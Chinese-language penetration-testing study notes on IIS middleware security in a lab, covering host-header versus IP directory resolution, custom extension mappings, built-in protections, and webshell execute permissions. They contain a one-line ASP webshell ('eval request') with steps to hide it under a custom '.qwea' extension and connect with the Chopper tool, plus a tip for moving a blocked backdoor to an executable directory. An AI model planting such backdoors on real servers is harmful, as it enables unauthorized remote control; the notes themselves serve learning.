搭建平台也就是中间件
一.涉及知识:
1.1.常见搭建平台脚本启用
系统好装,网站文件还得找。win2003加internet信息服务
输入IP地址访问该服务
1.2.域名、IP目录解析安全问题
- 添加主机头值,修改hosts文件,使用域名访问
- 这时发现,再使用IP地址访问即报错。因为主机头值修改,网站标识只剩下域名。不信可以添加新的标识不设置域名,IP依旧能访问
示例:使用域名访问表示正常;使用IP访问上层目录1.txt文件:“192.168.2.130/1.txt”,表示IP访问到的目录非主目录
- 结论:域名访问解析到登记的主目录,IP地址访问解析到上一层目录
- 意义:后台扫描(webpathbruth)时,使用ip扫描才可能发现网站域名的上一级发现备份压缩文件
- 原理:在设置域名解析时一般对应目录,而ip默认指向上一级目录
1.3.常见文件后缀对应安全
有些网站访问脚本格式将脚本格式解析,有些脚本格式不支持解析或者执行下载。因为网站根据访问文件后缀的不同,执行的是不同的路径文件去执行访问的操作,即ISAPI服务
示例:添加.qwea后缀对应asp脚本执行文件路径,留下后门文件“backdoor.qwea”,使用菜刀工具连接
- 添加后缀映射
- 编辑文件内容:<%eval request(“123”)%>,123是密码,放在主目录吧
- 配置软件连接
补充:
- 后缀对应可执行文件,如果其他扩展名对应可执行文件时,就会调用asp的脚本文件执行
- 正好还有两个后缀对应,没有截图这两个格式也解析成asp
1.4.常见安全测试中的安全防护
网站搭建时的自带的安全措施,需要了解
- 身份验证和访问控制:基于用户的限制。匿名访问不是没有身份,统一以来宾身份浏览
- ip地址和域名限制:白名单和黑名单问题,限制一些ip地址访问的权限
- 安全通信:关于网站 证书的东西,访问网站需要先安装证书。略
1.5.Web后门与用户及文件权限
网站的权限设置将会影响后门操作
示例:根据上边放置后门的注意点,后门文件需要给予执行权限(我从真实机拖进去的文件,默认没有执行权限)否则无法连接。因此通过修改网站中间件属性上执行权限的修改或网站文件的权限设置,能达到限制后门权限
绕过思路是,换目录。即网站文件也有需要执行的文件(images存放图片的目录除外),不能对全不目录限制执行权限,发现后门脚本不能运行时,可以放在其他有执行权限的目录,比如根目录。前提得有这种操作的权限
基本内容
- ASP,PHP,ASPX,JSP,PY,JAVAWEB 等环境-
- WEB 源码中敏感文件
- 后台路径,数据库配置文件,备份文件等
- IP 或域名解析 WEB 源码目录对应下的存在的安全问题
- 域名访问,IP 访问(结合类似备份文件目录)
- 脚本后缀对应解析(其他格式可相同-上传安全)
- 存在下载或为解析问题
- 常见防护中的 IP 验证,域名验证等
- 后门是否给予执行权限
- 后门是否给予操作目录或文件权限
- 后门是否给予其他用户权限
- 总结下关于可能会存在的安全或防护问题
二.演示案例
2.1.基于中间件的简要识别
从返回的数据包中判断中间件
2.2.基于中间件的安全漏洞
或者通过查阅资料寻找中间件的漏洞
《Web中间件漏洞常见问题》
2.3.基于中间件的靶场使用
示例:迪师傅演示的漏洞,是一个“.php.jge”的文件,被网站解析成图片格式但是也具有php脚本执行权限
遗留:下载源码,ubuntu系统运行靶场,